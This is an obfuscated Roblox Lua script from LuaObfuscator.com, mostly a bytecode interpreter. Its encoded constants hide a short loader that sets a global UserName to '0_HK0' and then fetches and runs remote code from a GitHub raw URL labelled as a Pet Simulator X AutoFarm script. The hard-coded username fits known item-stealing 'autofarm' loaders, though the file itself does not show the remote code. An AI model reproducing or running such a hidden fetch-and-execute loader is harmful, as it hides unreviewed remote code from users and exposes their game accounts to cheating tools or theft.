--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (v99==0) then v100=v5(v71,v19);v19=nil;v99=1;end end else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=0 + 0 ;local v73;while true do if (v72==(0 -0)) then v73=(v31/((5 -3)^(v32-1)))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 63 + 1)))) ;return v73-(v73%(932 -(857 + 74))) ;end end else local v74=((687 -(32 + 85)) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v74 + v74))>=v74) and (1 + 0)) or (0 -0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0;local v36;local v37;while true do if (v35==((180 -(67 + 113)) + 0)) then v36,v37=v1(v16,v18,v18 + ((704 + 255) -((2189 -1297) + 65)) );v18=v18 + (4 -2) ;v35=(1 + 0) -0 ;end if (v35==(1 -0)) then return (v37 * (606 -(87 + 263))) + v36 ;end end end local function v23()local v38=(0 + 0) -(0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==(953 -(802 + 150))) then return (v42 * (45169940 -28392724)) + (v41 * (118879 -53343)) + (v40 * (187 + 69)) + v39 ;end if (v38==(997 -(915 + (1269 -(1069 + 118))))) then v39,v40,v41,v42=v1(v16,v18,v18 + (8 -5) );v18=v18 + 4 ;v38=1;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1,43 -(83 -60) ) * (2^(6 + 26))) + v43 ;local v47=v20(v44,37 -16 ,31 + 0 );local v48=((v20(v44,823 -(368 + 423) )==1) and  -(3 -2)) or 1 ;if (v47==((1156 -(116 + 1022)) -(10 + 8))) then if (v46==((0 -0) -(859 -(814 + 45)))) then return v48 * ((1088 -646) -(416 + 26)) ;else local v78=0;while true do if (v78==(0 -0)) then v47=1 + 0 + 0 ;v45=0 -0 ;break;end end end elseif (v47==(2485 -(145 + 293))) then return ((v46==(0 + 0)) and (v48 * ((431 -(44 + 386))/(1486 -(998 + 488))))) or (v48 * NaN) ;end return v8(v48,v47-(325 + 247 + 451) ) * (v45 + (v46/((2 + 0)^(824 -(201 + 571))))) ;end local function v25(v49)local v50=885 -(261 + 624) ;local v51;local v52;while true do if (v50==(4 -1)) then return v6(v52);end if (v50==(1080 -(1020 + (826 -(745 + 21))))) then v51=nil;if  not v49 then v49=v23();if (v49==((490 + 933) -(630 + 793))) then return "";end end v50=3 -2 ;end if (v50==(9 -7)) then v52={};for v79=1 + 0 , #v51 do v52[v79]=v2(v1(v3(v51,v79,v79)));end v50=3;end if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -(1748 -(760 + 987)) );v18=v18 + v49 ;v50=1915 -(1789 + 124) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==2) then v58=nil;v59=nil;v53=32 -(22 + 7) ;end if ((2 + 2)~=v53) then else while true do if (2==v54) then local v98=0;while true do if (v98~=0) then else v59=nil;v60=nil;v98=1203 -(373 + 829) ;end if (v98==1) then v54=3;break;end end end if (v54==(0 + 0)) then v55=1130 -(369 + 761) ;v56=nil;v54=1986 -(1266 + 719) ;end if (v54~=(604 -(268 + 335))) then else v57=nil;v58=nil;v54=2;end if (v54~=(293 -(60 + 230))) then else v61=nil;while true do local v101=572 -(426 + 146) ;local v102;local v103;while true do if (v101==(1 + 0)) then while true do if ((238 -(64 + 174))==v102) then v103=0;while true do if (v103~=0) then else if (v55~=(1 + 1)) then else local v151=1456 -(282 + 1174) ;local v152;while true do if (v151==0) then v152=0;while true do local v160=811 -(569 + 242) ;while true do if (v160~=0) then else if (v152==(337 -(144 + 192))) then return v59;end if (v152==0) then local v161=216 -(42 + 174) ;while true do if ((1 + 0)==v161) then v152=2 -1 ;break;end if ((0 + 0)==v161) then for v164=1 + 0 ,v23() do local v165=1024 -(706 + 318) ;local v166;local v167;local v168;while true do if (v165==(1252 -(721 + 530))) then v168=nil;while true do if ((1 + 0)==v166) then while true do if (v167~=(1504 -(363 + 1141))) then else v168=v21();if (v20(v168,1581 -(1183 + 397) ,1272 -(945 + 326) )==(0 -0)) then local v179=0 + 0 ;local v180;local v181;local v182;local v183;while true do if (v179==(1975 -(1913 + 62))) then local v186=0 + 0 ;while true do if (v186==(700 -(271 + 429))) then v180=0 -0 ;v181=nil;v186=1;end if (v186==(1 + 0)) then v179=1501 -(1408 + 92) ;break;end end end if (v179~=(1934 -(565 + 1368))) then else local v187=0;while true do if (v187==(0 -0)) then v182=nil;v183=nil;v187=1;end if (v187~=(1087 -(461 + 625))) then else v179=1290 -(993 + 295) ;break;end end end if ((2 -0)~=v179) then else while true do if (v180~=(1 + 0)) then else local v189=1171 -(418 + 753) ;local v190;local v191;while true do if (1==v189) then while true do if (0~=v190) then else v191=856 -(564 + 292) ;while true do if ((0 + 0)==v191) then local v200=0 + 0 ;while true do if (v200~=(0 + 0)) then else v183={v22(),v22(),nil,nil};if (v181==(0 + 0)) then local v205=1769 -(1749 + 20) ;local v206;local v207;while true do if (v205~=1) then else while true do if (v206~=0) then else v207=0 + 0 ;while true do if ((0 + 0)~=v207) then else v183[3]=v22();v183[4]=v22();break;end end break;end end break;end if (0~=v205) then else v206=1322 -(1249 + 73) ;v207=nil;v205=1 + 0 ;end end elseif (v181==1) then v183[3]=v23();elseif (v181==(1147 -(466 + 679))) then v183[3]=v23() -((4 -2)^(45 -29)) ;elseif (v181==3) then local v210=1900 -(106 + 1794) ;while true do if (v210~=(0 + 0)) then else v183[2 + 1 ]=v23() -(2^16) ;v183[1142 -(782 + 356) ]=v22();break;end end end v200=1 + 0 ;end if (v200~=(2 -1)) then else v191=2 -1 ;break;end end end if (v191==(2 -1)) then v180=2;break;end end break;end end break;end if (v189==0) then v190=114 -(4 + 110) ;v191=nil;v189=1093 -(975 + 117) ;end end end if ((584 -(57 + 527))~=v180) then else local v192=0 + 0 ;local v193;while true do if (v192~=0) then else v193=0 -0 ;while true do if (v193==(3 -2)) then v180=1428 -(41 + 1386) ;break;end if (v193==(103 -(17 + 86))) then v181=v20(v168,3 -1 ,3 + 0 );v182=v20(v168,8 -4 ,17 -11 );v193=167 -(122 + 44) ;end end break;end end end if (v180==(2 -0)) then local v194=0;while true do if (v194~=(3 -2)) then else v180=5 -2 ;break;end if (v194~=(0 + 0)) then else local v198=0 -0 ;while true do if (v198~=(0 + 0)) then else local v199=0 -0 ;while true do if (v199==(1227 -(322 + 905))) then if (v20(v182,66 -(30 + 35) ,612 -(602 + 9) )==1) then v183[2 + 0 ]=v61[v183[1259 -(1043 + 214) ]];end if (v20(v182,7 -5 ,1214 -(323 + 889) )~=1) then else v183[3]=v61[v183[950 -(245 + 702) ]];end v199=2 -1 ;end if (v199~=(581 -(361 + 219))) then else v198=1 + 0 ;break;end end end if (v198~=(321 -(53 + 267))) then else v194=1899 -(260 + 1638) ;break;end end end end end if (v180~=3) then else if (v20(v182,3,3)==(441 -(382 + 58))) then v183[12 -8 ]=v61[v183[1 + 3 ]];end v56[v164]=v183;break;end end break;end end end break;end end break;end if (v166~=(0 + 0)) then else v167=0 -0 ;v168=nil;v166=1;end end break;end if (v165==(0 -0)) then v166=413 -(15 + 398) ;v167=nil;v165=1206 -(902 + 303) ;end end end for v169=1 -0 ,v23() do v57[v169-(2 -1) ]=v28();end v161=983 -(18 + 964) ;end end end break;end end end break;end end end if (v55==0) then local v153=1690 -(1121 + 569) ;while true do if (v153~=0) then else v56={};v57={};v153=1;end if (v153~=(7 -5)) then else v55=684 -(483 + 200) ;break;end if (v153~=(1464 -(1404 + 59))) then else local v159=0 + 0 ;while true do if ((2 -1)~=v159) then else v153=2 -0 ;break;end if (v159==(0 + 0)) then v58={};v59={v56,v57,nil,v58};v159=2 -1 ;end end end end end v103=1 -0 ;end if ((851 -(20 + 830))~=v103) then else if ((1 + 0)~=v55) then else local v154=126 -(116 + 10) ;local v155;local v156;while true do if (v154~=(1 + 0)) then else while true do if (v155~=(738 -(542 + 196))) then else v156=0 -0 ;while true do if (v156~=2) then else v55=1 + 1 ;break;end if (v156~=(1 + 0)) then else local v162=0 + 0 ;local v163;while true do if (v162~=(0 -0)) then else v163=0 -0 ;while true do if (v163~=(0 -0)) then else local v171=0 -0 ;while true do if (v171~=1) then else v163=1;break;end if (v171==0) then for v173=2 -1 ,v60 do local v174=1551 -(1126 + 425) ;local v175;local v176;local v177;while true do if (v174~=(406 -(118 + 287))) then else v177=nil;while true do if (1==v175) then if (v176==1) then v177=v21()~=(0 -0) ;elseif (v176==(1123 -(118 + 1003))) then v177=v24();elseif (v176~=(2 + 1)) then else v177=v25();end v61[v173]=v177;break;end if (v175~=(163 -(92 + 71))) then else local v185=0;while true do if (v185==1) then v175=1 + 0 ;break;end if ((0 -0)==v185) then local v188=377 -(142 + 235) ;while true do if (v188~=(1 + 0)) then else v185=2 -1 ;break;end if (v188~=0) then else v176=v21();v177=nil;v188=1;end end end end end end break;end if ((0 -0)~=v174) then else local v178=0 + 0 ;while true do if (v178~=(978 -(553 + 424))) then else v174=1 -0 ;break;end if (v178~=(0 + 0)) then else v175=0 + 0 ;v176=nil;v178=1 + 0 ;end end end end end v59[2 + 1 ]=v21();v171=1 + 0 ;end end end if (v163~=(1 -0)) then else v156=4 -2 ;break;end end break;end end end if (v156==(1790 -(573 + 1217))) then v60=v23();v61={};v156=1;end end break;end end break;end if (v154==(0 -0)) then v155=0 -0 ;v156=nil;v154=1;end end end break;end end break;end end break;end if (v101==0) then v102=0;v103=nil;v101=2 -1 ;end end end break;end end break;end if (v53~=(1 + 0)) then else v56=nil;v57=nil;v53=9 -7 ;end if (v53==(756 -(239 + 514))) then v60=nil;v61=nil;v53=2 + 2 ;end if (v53==(0 -0)) then v54=1329 -(797 + 532) ;v55=nil;v53=1 + 0 ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (0==v65) then v66=v62[1];v67=v62[2];v65=1;end if (1==v65) then v68=v62[3];return function(...)local v81=v66;local v82=v67;local v83=v68;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=4) then if (v94<=1) then if (v94>0) then v91[v93[2]]=v64[v93[3]];else v91[v93[2]]();end elseif (v94<=2) then v91[v93[2]][v93[3]]=v93[4];elseif (v94==3) then local v132=0;local v133;while true do if (v132==0) then v133=v93[2];v91[v133]=v91[v133](v13(v91,v133 + 1 ,v86));break;end end else v91[v93[2]]=v93[3];end elseif (v94<=6) then if (v94>5) then local v112;local v113,v114;local v115;local v116;v91[v93[2]]=v64[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]][v93[3]]=v93[4];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v64[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v64[v93[3]];v85=v85 + 1 ;v93=v81[v85];v116=v93[2];v115=v91[v93[3]];v91[v116 + 1 ]=v115;v91[v116]=v115[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v116=v93[2];v113,v114=v84(v91[v116](v13(v91,v116 + 1 ,v93[3])));v86=(v114 + v116) -1 ;v112=0;for v129=v116,v86 do v112=v112 + 1 ;v91[v129]=v113[v112];end v85=v85 + 1 ;v93=v81[v85];v116=v93[2];v91[v116]=v91[v116](v13(v91,v116 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();else v91[v93[2]]=v93[3]~=0 ;end elseif (v94<=7) then do return;end elseif (v94>8) then local v136=0;local v137;local v138;local v139;local v140;while true do if (v136==0) then v137=v93[2];v138,v139=v84(v91[v137](v13(v91,v137 + 1 ,v93[3])));v136=1;end if (1==v136) then v86=(v139 + v137) -1 ;v140=0;v136=2;end if (v136==2) then for v149=v137,v86 do local v150=0;while true do if (v150==0) then v140=v140 + 1 ;v91[v149]=v138[v140];break;end end end break;end end else local v141=v93[2];local v142=v91[v93[3]];v91[v141 + 1 ]=v142;v91[v141]=v142[v93[4]];end v85=v85 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O0003023O005F4703083O00557365724E616D6503053O00305F484B30030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C7561000B3O0012063O00013O00304O0002000300124O00043O00122O000100053O00202O00010001000600122O000300076O000400016O000100049O0000026O000100012O00073O00017O00",v9(),...);
